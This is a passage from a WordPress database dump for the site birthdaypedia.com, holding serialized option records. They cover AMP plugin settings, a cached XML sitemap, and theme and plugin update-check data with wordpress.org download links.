-ads-text-feild-client-4\";s:23:\"ca-pub-7270870419197348\";s:32:\"enable-amp-ads-text-feild-slot-4\";s:10:\"6153855449\";s:16:\"enable-amp-ads-5\";s:1:\"0\";s:23:\"enable-amp-ads-select-5\";s:1:\"2\";s:34:\"enable-amp-ads-text-feild-client-5\";s:0:\"\";s:32:\"enable-amp-ads-text-feild-slot-5\";s:0:\"\";s:16:\"enable-amp-ads-6\";s:1:\"0\";s:23:\"enable-amp-ads-select-6\";s:1:\"2\";s:34:\"enable-amp-ads-text-feild-client-6\";s:0:\"\";s:32:\"enable-amp-ads-text-feild-slot-6\";s:0:\"\";s:29:\"ampforwp-seo-meta-description\";s:1:\"0\";s:35:\"ampforwp-seo-custom-additional-meta\";s:0:\"\";s:23:\"ampforwp-seo-yoast-meta\";s:1:\"1\";s:30:\"ampforwp-seo-yoast-description\";s:1:\"0\";s:42:\"ampforwp-robots-archive-sub-pages-sitewide\";s:1:\"0\";s:36:\"ampforwp-robots-archive-author-pages\";s:1:\"1\";s:34:\"ampforwp-robots-archive-date-pages\";s:1:\"1\";s:38:\"ampforwp-robots-archive-category-pages\";s:1:\"1\";s:33:\"ampforwp-robots-archive-tag-pages\";s:1:\"1\";s:28:\"ampforwp_cache_minimize_mode\";s:1:\"0\";s:27:\"amp-analytics-select-option\";s:1:\"1\";s:8:\"ga-feild\";s:10:\"UA-XXXXX-Y\";s:32:\"ampforwp-ga-field-advance-switch\";s:1:\"0\";s:25:\"ampforwp-ga-field-advance\";s:0:\"\";s:8:\"sa-feild\";s:17:\"SEGMENT-WRITE-KEY\";s:8:\"pa-feild\";s:1:\"#\";s:9:\"eam-feild\";s:1:\"#\";s:8:\"sc-feild\";s:1:\"#\";s:28:\"amp-quantcast-analytics-code\";s:0:\"\";s:30:\"amp-comscore-analytics-code-c1\";s:1:\"1\";s:30:\"amp-comscore-analytics-code-c2\";s:0:\"\";s:13:\"histats-feild\";s:0:\"\";s:33:\"amp-Yandex-Metrika-analytics-code\";s:0:\"\";s:28:\"amp-Chartbeat-analytics-code\";s:0:\"\";s:18:\"amp-use-gtm-option\";s:1:\"0\";s:10:\"amp-gtm-id\";s:0:\"\";s:22:\"amp-gtm-analytics-type\";s:0:\"\";s:22:\"amp-gtm-analytics-code\";s:0:\"\";s:12:\"amp-fb-pixel\";s:1:\"0\";s:15:\"amp-fb-pixel-id\";s:0:\"\";s:22:\"ampforwp-sd-type-posts\";s:11:\"BlogPosting\";s:22:\"ampforwp-sd-type-pages\";s:11:\"BlogPosting\";s:24:\"amp-structured-data-logo\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:27:\"ampforwp-sd-logo-dimensions\";s:1:\"0\";s:22:\"ampforwp-sd-logo-width\";s:3:\"600\";s:23:\"ampforwp-sd-logo-height\";s:2:\"60\";s:37:\"amp-structured-data-placeholder-image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:43:\"amp-structured-data-placeholder-image-width\";s:3:\"700\";s:44:\"amp-structured-data-placeholder-image-height\";s:3:\"550\";s:39:\"amporwp-structured-data-video-thumb-url\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:24:\"amp-enable-notifications\";s:0:\"\";s:21:\"amp-notification-text\";s:26:\"This website uses cookies.\";s:22:\"amp-accept-button-text\";s:6:\"Accept\";s:22:\"amp-enable-contactform\";s:0:\"\";s:31:\"amp-enable-gravityforms_support\";s:0:\"\";s:26:\"wordpress-comments-support\";s:0:\"\";s:27:\"ampforwp-number-of-comments\";s:2:\"10\";s:32:\"ampforwp-disqus-comments-support\";s:1:\"0\";s:29:\"ampforwp-disqus-comments-name\";s:0:\"\";s:29:\"ampforwp-disqus-host-position\";s:1:\"1\";s:25:\"ampforwp-disqus-host-file\";s:0:\"\";s:34:\"ampforwp-facebook-comments-support\";s:1:\"0\";s:36:\"ampforwp-number-of-fb-no-of-comments\";s:2:\"10\";s:25:\"fb-instant-article-switch\";s:1:\"0\";s:33:\"ampforwp-fb-instant-article-posts\";s:0:\"\";s:22:\"fb-instant-article-ads\";s:1:\"0\";s:24:\"fb-instant-article-ad-id\";s:0:\"\";s:28:\"fb-instant-article-analytics\";s:1:\"0\";s:33:\"fb-instant-article-analytics-code\";s:0:\"\";s:22:\"amp-pages-meta-default\";s:4:\"show\";s:19:\"hide-amp-categories\";a:58:{i:517;s:0:\"\";i:521;s:0:\"\";i:565;s:0:\"\";i:655;s:0:\"\";i:543;s:0:\"\";i:531;s:0:\"\";i:569;s:0:\"\";i:534;s:0:\"\";i:536;s:0:\"\";i:527;s:0:\"\";i:538;s:0:\"\";i:554;s:0:\"\";i:207;s:0:\"\";i:576;s:0:\"\";i:545;s:0:\"\";i:530;s:0:\"\";i:575;s:0:\"\";i:548;s:0:\"\";i:654;s:0:\"\";i:643;s:0:\"\";i:525;s:0:\"\";i:544;s:0:\"\";i:532;s:0:\"\";i:553;s:0:\"\";i:526;s:0:\"\";i:520;s:0:\"\";i:81;s:0:\"\";i:646;s:0:\"\";i:568;s:0:\"\";i:567;s:0:\"\";i:555;s:0:\"\";i:557;s:0:\"\";i:566;s:0:\"\";i:542;s:0:\"\";i:561;s:0:\"\";i:519;s:0:\"\";i:523;s:0:\"\";i:524;s:0:\"\";i:571;s:0:\"\";i:605;s:0:\"\";i:574;s:0:\"\";i:579;s:0:\"\";i:528;s:0:\"\";i:645;s:0:\"\";i:578;s:0:\"\";i:559;s:0:\"\";i:558;s:0:\"\";i:570;s:0:\"\";i:529;s:0:\"\";i:533;s:0:\"\";i:552;s:0:\"\";i:518;s:0:\"\";i:522;s:0:\"\";i:546;s:0:\"\";i:1;s:0:\"\";i:556;s:0:\"\";i:537;s:0:\"\";i:644;s:0:\"\";}s:22:\"amp-mobile-redirection\";s:1:\"0\";s:29:\"amp-header-text-area-for-html\";s:0:\"\";s:18:\"amp-body-text-area\";s:0:\"\";s:29:\"amp-footer-text-area-for-html\";s:0:\"\";s:27:\"ampforwp-auto-amp-menu-link\";s:1:\"0\";s:35:\"ampforwp-category-base-removel-link\";s:1:\"0\";s:30:\"ampforwp-tag-base-removal-link\";s:1:\"0\";s:44:\"ampforwp-custom-fields-featured-image-switch\";s:1:\"0\";s:37:\"ampforwp-custom-fields-featured-image\";s:0:\"\";s:36:\"ampforwp-featured-image-from-content\";s:1:\"0\";s:33:\"ampforwp-duplicate-featured-image\";s:1:\"0\";s:25:\"ampforwp-development-mode\";s:1:\"0\";s:11:\"amp-use-pot\";s:1:\"0\";s:35:\"amp-translator-show-more-posts-text\";s:15:\"Show more Posts\";s:39:\"amp-translator-show-previous-posts-text\";s:19:\"Show previous Posts\";s:23:\"amp-translator-top-text\";s:3:\"Top\";s:32:\"amp-translator-non-amp-page-text\";s:20:\"View Non-AMP Version\";s:27:\"amp-translator-related-text\";s:12:\"Related Post\";s:28:\"amp-translator-navigate-text\";s:8:\"Navigate\";s:22:\"amp-translator-on-text\";s:2:\"On\";s:24:\"amp-translator-next-text\";s:4:\"Next\";s:28:\"amp-translator-previous-text\";s:8:\"Previous\";s:26:\"amp-translator-footer-text\";s:19:\"All Rights Reserved\";s:30:\"amp-translator-categories-text\";s:12:\"Categories: \";s:24:\"amp-translator-tags-text\";s:6:\"Tags: \";s:22:\"amp-translator-by-text\";s:2:\"By\";s:27:\"amp-translator-published-by\";s:12:\"Published by\";s:29:\"amp-translator-in-designthree\";s:2:\"in\";s:33:\"amp-translator-view-comments-text\";s:13:\"View Comments\";s:35:\"amp-translator-leave-a-comment-text\";s:15:\"Leave a Comment\";s:22:\"amp-translator-at-text\";s:2:\"at\";s:24:\"amp-translator-says-text\";s:4:\"says\";s:24:\"amp-translator-Edit-text\";s:4:\"Edit\";s:28:\"amp-translator-ago-date-text\";s:3:\"ago\";s:33:\"amp-translator-modified-date-text\";s:31:\"This post was last modified on \";s:31:\"amp-translator-archive-cat-text\";s:10:\"Category: \";s:31:\"amp-translator-archive-tag-text\";s:5:\"Tag: \";s:29:\"amp-translator-show-more-text\";s:15:\"View More Posts\";s:29:\"amp-translator-next-read-text\";s:11:\"Next Read: \";s:23:\"amp-translator-via-text\";s:3:\"via\";s:26:\"amp-translator-search-text\";s:19:\" You searched for: \";s:30:\"amp-translator-search-no-found\";s:49:\" It seems we can\'t find what you\'re looking for. \";s:27:\"ampforwp-search-placeholder\";s:9:\"Type Here\";s:19:\"amp-design-selector\";s:1:\"2\";s:30:\"amp-opt-color-rgba-colorscheme\";a:3:{s:5:\"color\";s:7:\"#F42F42\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:17:\"rgba(244,47,66,1)\";}s:23:\"amp-opt-color-rgba-font\";a:3:{s:5:\"color\";s:4:\"#fff\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:19:\"rgba(255,255,255,1)\";}s:23:\"amp-opt-color-rgba-link\";a:3:{s:5:\"color\";s:7:\"#f42f42\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:17:\"rgba(244,47,66,1)\";}s:31:\"amp-opt-color-rgba-link-design2\";a:3:{s:5:\"color\";s:7:\"#0a89c0\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:18:\"rgba(10,137,192,1)\";}s:31:\"amp-opt-color-rgba-link-design1\";a:3:{s:5:\"color\";s:7:\"#0a89c0\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:18:\"rgba(10,137,192,1)\";}s:27:\"enable-amp-call-numberfield\";s:0:\"\";s:35:\"amp-opt-color-rgba-colorscheme-call\";a:3:{s:5:\"color\";s:7:\"#0a89c0\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:18:\"rgba(10,137,192,1)\";}s:10:\"css_editor\";s:54:\"/******* Paste your Custom CSS in this Editor *******/\";s:17:\"ampforwp-amp-menu\";s:1:\"1\";s:27:\"amp-design-3-search-feature\";s:1:\"0\";s:27:\"amp-design-2-search-feature\";s:1:\"0\";s:27:\"amp-design-1-search-feature\";s:1:\"0\";s:23:\"ampforwp-callnow-button\";s:1:\"0\";s:30:\"amp-opt-color-rgba-headercolor\";a:3:{s:5:\"color\";s:7:\"#FFFFFF\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:19:\"rgba(255,255,255,1)\";}s:33:\"amp-opt-color-rgba-headerelements\";a:3:{s:5:\"color\";s:4:\"#333\";s:5:\"alpha\";s:1:\"1\";s:4:\"rgba\";s:16:\"rgba(51,51,51,1)\";}s:40:\"amp-on-off-support-for-non-amp-home-page\";s:1:\"0\";s:19:\"amp-opt-sticky-head\";s:1:\"0\";s:28:\"amp-design-3-featured-slider\";s:1:\"1\";s:30:\"amp-design-3-category-selector\";s:0:\"\";s:23:\"excerpt-option-design-1\";s:1:\"1\";s:20:\"amp-design-1-excerpt\";s:2:\"20\";s:26:\"ampforwp-design1-cats-home\";s:1:\"0\";s:23:\"excerpt-option-design-2\";s:1:\"0\";s:20:\"amp-design-2-excerpt\";s:2:\"20\";s:23:\"excerpt-option-design-3\";s:1:\"0\";s:20:\"amp-design-3-excerpt\";s:2:\"20\";s:26:\"amp-design-1-featured-time\";s:1:\"1\";s:26:\"amp-design-3-featured-time\";s:1:\"1\";s:41:\"ampforwp-homepage-posts-image-modify-size\";s:1:\"0\";s:40:\"ampforwp-homepage-posts-design-1-2-width\";s:3:\"100\";s:41:\"ampforwp-homepage-posts-design-1-2-height\";s:2:\"75\";s:38:\"ampforwp-homepage-posts-design-3-width\";s:3:\"330\";s:39:\"ampforwp-homepage-posts-design-3-height\";s:3:\"198\";s:20:\"ampforwp-bread-crumb\";s:1:\"1\";s:20:\"ampforwp-cats-single\";s:1:\"1\";s:20:\"ampforwp-tags-single\";s:1:\"1\";s:31:\"ampforwp-cats-tags-links-single\";s:1:\"1\";s:26:\"enable-single-social-icons\";s:1:\"1\";s:21:\"enable-excerpt-single\";s:1:\"0\";s:23:\"enable-single-next-prev\";s:1:\"1\";s:18:\"post-modified-date\";s:1:\"0\";s:22:\"amp-author-description\";s:1:\"1\";s:24:\"ampforwp-author-page-url\";s:1:\"0\";s:25:\"amp-design-3-date-feature\";s:1:\"0\";s:14:\"amp-pagination\";s:1:\"0\";s:38:\"ampforwp-single-select-type-of-related\";s:1:\"2\";s:38:\"ampforwp-single-order-of-related-posts\";s:1:\"0\";s:32:\"ampforwp-number-of-related-posts\";s:1:\"3\";s:29:\"ampforwp-inline-related-posts\";s:1:\"0\";s:28:\"amp-footer-link-non-amp-page\";s:1:\"1\";s:19:\"ampforwp-footer-top\";s:1:\"1\";s:27:\"ampforwp-footer-top-design3\";s:1:\"0\";s:24:\"amp-design-3-credit-link\";s:1:\"1\";s:9:\"meta_page\";s:1:\"0\";s:28:\"enable-single-facebook-share\";s:1:\"0\";s:19:\"amp-facebook-app-id\";s:0:\"\";s:27:\"enable-single-twitter-share\";s:1:\"1\";s:34:\"enable-single-twitter-share-handle\";s:0:\"\";s:32:\"enable-single-twitter-share-link\";s:1:\"0\";s:25:\"enable-single-gplus-share\";s:1:\"1\";s:25:\"enable-single-email-share\";s:1:\"1\";s:29:\"enable-single-pinterest-share\";s:1:\"1\";s:28:\"enable-single-linkedin-share\";s:1:\"1\";s:28:\"enable-single-whatsapp-share\";s:1:\"1\";s:24:\"enable-single-line-share\";s:1:\"1\";s:22:\"enable-single-vk-share\";s:1:\"0\";s:33:\"enable-single-odnoklassniki-share\";s:1:\"0\";s:30:\"enable-single-twittter-profile\";s:1:\"1\";s:34:\"enable-single-twittter-profile-url\";s:1:\"#\";s:30:\"enable-single-facebook-profile\";s:1:\"1\";s:34:\"enable-single-facebook-profile-url\";s:1:\"#\";s:30:\"enable-single-pintrest-profile\";s:1:\"1\";s:34:\"enable-single-pintrest-profile-url\";s:1:\"#\";s:33:\"enable-single-google-plus-profile\";s:1:\"0\";s:37:\"enable-single-google-plus-profile-url\";s:0:\"\";s:29:\"enable-single-linkdin-profile\";s:1:\"0\";s:33:\"enable-single-linkdin-profile-url\";s:0:\"\";s:29:\"enable-single-youtube-profile\";s:1:\"1\";s:33:\"enable-single-youtube-profile-url\";s:1:\"#\";s:31:\"enable-single-instagram-profile\";s:1:\"0\";s:35:\"enable-single-instagram-profile-url\";s:0:\"\";s:31:\"enable-single-VKontakte-profile\";s:1:\"0\";s:35:\"enable-single-VKontakte-profile-url\";s:0:\"\";s:28:\"enable-single-reddit-profile\";s:1:\"0\";s:32:\"enable-single-reddit-profile-url\";s:0:\"\";s:30:\"enable-single-snapchat-profile\";s:1:\"0\";s:34:\"enable-single-snapchat-profile-url\";s:0:\"\";s:28:\"enable-single-Tumblr-profile\";s:1:\"0\";s:32:\"enable-single-Tumblr-profile-url\";s:0:\"\";s:21:\"amp-rtl-select-option\";s:1:\"0\";s:28:\"ampforwp-plugin-manager-core\";s:1:\"0\";s:34:\"ampforwp-ads-data-loading-strategy\";i:0;s:27:\"ampforwp-web-push-onesignal\";i:0;s:28:\"ampforwp-onesignal-http-site\";i:0;s:39:\"ampforwp-onesignal-translator-subscribe\";s:20:\"Subscribe to updates\";s:41:\"ampforwp-onesignal-translator-unsubscribe\";s:24:\"Unsubscribe from updates\";s:35:\"fb-instant-article-ad-density-setup\";s:7:\"default\";s:20:\"amp-meta-permissions\";s:3:\"all\";s:32:\"ampforwp-update-notification-bar\";i:1;s:40:\"amp-translator-breadcrumbs-homepage-text\";s:8:\"Homepage\";s:25:\"ampforwp-post-date-format\";s:1:\"1\";s:30:\"ampforwp-post-date-format-text\";s:10:\"% days ago\";s:39:\"ampforwp-number-of-inline-related-posts\";s:1:\"3\";s:29:\"ampforwp-facebook-like-button\";i:0;s:31:\"ampforwp-sub-categories-support\";s:1:\"0\";s:18:\"ampforwp-ga-switch\";b:1;s:23:\"ampforwp-Segment-switch\";b:0;s:21:\"ampforwp-Piwik-switch\";b:0;s:25:\"ampforwp-Quantcast-switch\";b:0;s:24:\"ampforwp-comScore-switch\";b:0;s:25:\"ampforwp-Effective-switch\";b:0;s:27:\"ampforwp-StatCounter-switch\";b:0;s:23:\"ampforwp-Histats-switch\";b:0;s:22:\"ampforwp-Yandex-switch\";b:0;s:25:\"ampforwp-Chartbeat-switch\";b:0;s:21:\"ampforwp-Alexa-switch\";b:0;s:22:\"ampforwp-alexa-account\";s:0:\"\";s:21:\"ampforwp-alexa-domain\";s:0:\"\";s:41:\"ampforwp-web-push-onesignal-below-content\";i:1;s:41:\"ampforwp-web-push-onesignal-above-content\";i:0;s:35:\"ampforwp-instant-article-author-bio\";i:0;s:34:\"ampforwp-inline-related-posts-type\";s:1:\"2\";s:35:\"ampforwp-inline-related-posts-order\";i:0;s:29:\"ampforwp-nofollow-view-nonamp\";i:0;s:22:\"ampforwp_subpages_list\";s:1:\"0\";s:25:\"ampforwp-post-date-global\";s:1:\"1\";s:20:\"ampforwp-wptexturize\";i:0;s:26:\"enable-single-reddit-share\";i:0;s:26:\"enable-single-tumblr-share\";i:0;s:28:\"enable-single-telegram-share\";i:0;s:24:\"enable-single-digg-share\";i:0;s:31:\"enable-single-stumbleupon-share\";i:0;s:26:\"enable-single-wechat-share\";i:0;s:25:\"enable-single-viber-share\";i:0;s:33:\"ampforwp-custom-type-amp-endpoint\";i:0;}','yes'),(33507,'redux_builder_amp-transients','a:2:{s:14:\"changed_values\";a:21:{s:16:\"enable-amp-ads-1\";i:0;s:23:\"enable-amp-ads-select-1\";s:1:\"2\";s:34:\"enable-amp-ads-text-feild-client-1\";s:0:\"\";s:32:\"enable-amp-ads-text-feild-slot-1\";s:0:\"\";s:16:\"enable-amp-ads-2\";i:0;s:23:\"enable-amp-ads-select-2\";s:1:\"2\";s:34:\"enable-amp-ads-text-feild-client-2\";s:0:\"\";s:32:\"enable-amp-ads-text-feild-slot-2\";s:0:\"\";s:16:\"enable-amp-ads-4\";i:0;s:23:\"enable-amp-ads-select-4\";s:1:\"2\";s:34:\"enable-amp-ads-text-feild-client-4\";s:0:\"\";s:32:\"enable-amp-ads-text-feild-slot-4\";s:0:\"\";s:19:\"hide-amp-categories\";i:0;s:30:\"amp-opt-color-rgba-colorscheme\";a:1:{s:5:\"color\";s:7:\"#F42F42\";}s:23:\"amp-opt-color-rgba-font\";a:1:{s:5:\"color\";s:4:\"#fff\";}s:23:\"amp-opt-color-rgba-link\";a:1:{s:5:\"color\";s:7:\"#f42f42\";}s:31:\"amp-opt-color-rgba-link-design2\";a:1:{s:5:\"color\";s:7:\"#0a89c0\";}s:31:\"amp-opt-color-rgba-link-design1\";a:1:{s:5:\"color\";s:7:\"#0a89c0\";}s:35:\"amp-opt-color-rgba-colorscheme-call\";a:1:{s:5:\"color\";s:7:\"#0a89c0\";}s:30:\"amp-opt-color-rgba-headercolor\";a:1:{s:5:\"color\";s:7:\"#FFFFFF\";}s:33:\"amp-opt-color-rgba-headerelements\";a:1:{s:5:\"color\";s:4:\"#333\";}}s:9:\"last_save\";i:1516808460;}','yes'),(33508,'ampforwp_default_pages_to','show','yes'),(33509,'AMPforwp_db_version','0.9.66.1','yes'),(33512,'ampforwp_custom_post_types','a:2:{s:4:\"post\";s:4:\"post\";s:4:\"page\";s:4:\"page\";}','yes'),(34544,'external_updates-wcp-theia-post-slider','O:8:\"stdClass\":2:{s:9:\"lastCheck\";i:1674812615;s:14:\"checkedVersion\";s:6:\"1.15.1\";}','no'),(34658,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(35594,'ampforwp_cpt_generated_post_types','a:0:{}','yes'),(35616,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:17:\"glowens@gmail.com\";s:7:\"version\";s:6:\"4.9.16\";s:9:\"timestamp\";i:1604018442;}','no'),(37594,'_transient_yst_sm_page_1:4Wt5G_6b5cL','C:24:\"WPSEO_Sitemap_Cache_Data\":1777:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:1729:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n <url>\n <loc>https://birthdaypedia.com/</loc>\n <lastmod>2017-01-27T19:51:54+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/sample-page/</loc>\n <lastmod>2015-04-27T23:02:47+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/birthdaypedia-guest-blogger/</loc>\n <lastmod>2015-10-12T19:24:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/advertise-with-us/</loc>\n <lastmod>2015-10-14T19:54:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/terms-of-use/</loc>\n <lastmod>2017-01-27T19:44:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/privacy-policy/</loc>\n <lastmod>2017-01-27T19:44:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/contact-us-2/</loc>\n <lastmod>2017-01-27T19:45:12+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/iStock_000008906483_Small.jpg</image:loc>\n <image:caption><![CDATA[iStock_000008906483_Small]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/about-us/</loc>\n <lastmod>2017-01-27T19:45:24+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/hed.jpg</image:loc>\n <image:caption><![CDATA[hed]]></image:caption>\n </image:image>\n </url>\n</urlset>\";}}','no'),(96737,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1674812619;s:7:\"checked\";a:7:{s:9:\"Newspaper\";s:3:\"7.8\";s:13:\"twentyfifteen\";s:3:\"1.7\";s:14:\"twentyfourteen\";s:3:\"1.9\";s:15:\"twentyseventeen\";s:3:\"1.1\";s:13:\"twentysixteen\";s:3:\"1.3\";s:14:\"twentythirteen\";s:3:\"2.1\";s:11:\"wp-techdesk\";s:4:\"1.05\";}s:8:\"response\";a:5:{s:13:\"twentyfifteen\";a:6:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"3.3\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.3.3.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:5:\"5.2.4\";}s:14:\"twentyfourteen\";a:6:{s:5:\"theme\";s:14:\"twentyfourteen\";s:11:\"new_version\";s:3:\"3.5\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentyfourteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentyfourteen.3.5.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentyseventeen\";a:6:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"3.1\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.3.1.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:13:\"twentysixteen\";a:6:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"2.8\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.2.8.zip\";s:8:\"requires\";s:3:\"4.4\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:14:\"twentythirteen\";a:6:{s:5:\"theme\";s:14:\"twentythirteen\";s:11:\"new_version\";s:3:\"3.7\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentythirteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentythirteen.3.7.zip\";s:8:\"requires\";s:3:\"3.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}}s:12:\"translations\";a:0:{}}','no'),(96738,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1674812618;s:8:\"response\";a:6:{s:53:\"accelerated-mobile-pages/accelerated-moblie-pages.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:38:\"w.org/plugins/accelerated-mobile-pages\";s:4:\"slug\";s:24:\"accelerated-mobile-pages\";s:6:\"plugin\";s:53:\"accelerated-mobile-pages/accelerated-moblie-pages.php\";s:11:\"new_version\";s:6:\"1.0.79\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/accelerated-mobile-pages/\";s:7:\"package\";s:74:\"https://downloads.wordpress.org/plugin/accelerated-mobile-pages.1.0.79.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/accelerated-mobile-pages/assets/icon-256x256.png?rev=1693616\";s:2:\"1x\";s:77:\"https://ps.w.org/accelerated-mobile-pages/assets/icon-128x128.png?rev=1693616\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/accelerated-mobile-pages/assets/banner-1544x500.png?rev=1776918\";s:2:\"1x\";s:79:\"https://ps.w.org/accelerated-mobile-pages/assets/banner-772x250.png?rev=1776918\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:11:\"amp/amp.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:17:\"w.org/plugins/amp\";s:4:\"slug\";s:3:\"amp\";s:6:\"plugin\";s:11:\"amp/amp.php\";s:11:\"new_version\";s:5:\"2.3.0\";s:3:\"url\";s:34:\"https://wordpress.org/plugins/amp/\";s:7:\"package\";s:52:\"https://downloads.wordpress.org/plugin/amp.2.3.0.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:56:\"https://ps.w.org/amp/assets/icon-256x256.png?rev=2527602\";s:2:\"1x\";s:48:\"https://ps.w.org/amp/assets/icon.svg?rev=2527602\";s:3:\"svg\";s:48:\"https://ps.w.org/amp/assets/icon.svg?rev=2527602\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/amp/assets/banner-1544x500.png?rev=2527602\";s:2:\"1x\";s:58:\"https://ps.w.org/amp/assets/banner-772x250.png?rev=2527602\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"7.0\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:47:\"better-search-replace/better-search-replace.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:35:\"w.org/plugins/better-search-replace\";s:4:\"slug\";s:21:\"better-search-replace\";s:6:\"plugin\";s:47:\"better-search-replace/better-search-replace.php\";s:11:\"new_version\";s:5:\"1.4.2\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/better-search-replace/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/better-search-replace.1.4.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/better-search-replace/assets/icon-256x256.png?rev=2706527\";s:2:\"1x\";s:74:\"https://ps.w.org/better-search-replace/assets/icon-128x128.png?rev=2706527\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/better-search-replace/assets/banner-1544x500.png?rev=2706527\";s:2:\"1x\";s:76:\"https://ps.w.org/better-search-replace/assets/banner-772x250.jpg?rev=2706527\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:25:\"cloudflare/cloudflare.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/cloudflare\";s:4:\"slug\";s:10:\"cloudflare\";s:6:\"plugin\";s:25:\"cloudflare/cloudflare.php\";s:11:\"new_version\";s:6:\"4.11.0\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/cloudflare/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/cloudflare.4.11.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/cloudflare/assets/icon-256x256.png?rev=2471183\";s:2:\"1x\";s:63:\"https://ps.w.org/cloudflare/assets/icon-128x128.png?rev=2471183\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/cloudflare/assets/banner-1544x500.png?rev=2471183\";s:2:\"1x\";s:65:\"https://ps.w.org/cloudflare/assets/banner-772x250.png?rev=2471183\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.4\";s:6:\"tested\";s:5:\"5.9.5\";s:12:\"requires_php\";s:3:\"7.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:59:\"force-regenerate-thumbnails/force-regenerate-thumbnails.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:41:\"w.org/plugins/force-regenerat